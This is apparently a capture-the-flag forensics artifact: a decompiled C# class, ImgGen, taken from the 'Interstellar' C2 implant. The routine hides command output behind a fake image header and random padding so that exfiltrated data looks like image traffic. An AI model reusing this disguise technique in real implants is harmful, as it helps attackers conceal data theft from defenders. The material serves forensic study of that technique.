HTB:CA2023 Forensics Interstellar ImgGen C2 class

ImgGen.cs

internal static class ImgGen
{
	// Token: 0x06000020 RID: 32 RVA: 0x00003478 File Offset: 0x00001678
	internal static void Init(string stringIMGS)
	{
		IEnumerable<string> source = from Match m in Program.ImgGen._re.Matches(stringIMGS.Replace(",", ""))
		select m.Value;
		source = from m in source
		where !string.IsNullOrEmpty(m)
		select m;
		Program.ImgGen._newImgs = source.ToList<string>();
	}

	// Token: 0x06000021 RID: 33 RVA: 0x000034F6 File Offset: 0x000016F6
	private static string RandomString(int length)
	{
		return new string((from s in Enumerable.Repeat<string>("...................@..........................Tyscf", length)
		select s[Program.ImgGen._rnd.Next(s.Length)]).ToArray<char>());
	}

	// Token: 0x06000022 RID: 34 RVA: 0x00003530 File Offset: 0x00001730
	internal static byte[] GetImgData(byte[] cmdoutput)
	{
		int num = 1500;
		int num2 = cmdoutput.Length + num;
		string s = Program.ImgGen._newImgs[new Random().Next(0, Program.ImgGen._newImgs.Count)];
		byte[] array = Convert.FromBase64String(s);
		byte[] bytes = Encoding.UTF8.GetBytes(Program.ImgGen.RandomString(num - array.Length));
		byte[] array2 = new byte[num2];
		Array.Copy(array, 0, array2, 0, array.Length);
		Array.Copy(bytes, 0, array2, array.Length, bytes.Length);
		Array.Copy(cmdoutput, 0, array2, array.Length + bytes.Length, cmdoutput.Length);
		return array2;
	}

	// Token: 0x04000016 RID: 22
	private static Random _rnd = new Random();

	// Token: 0x04000017 RID: 23
	private static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);

	// Token: 0x04000018 RID: 24
	private static List<string> _newImgs = new List<string>();
}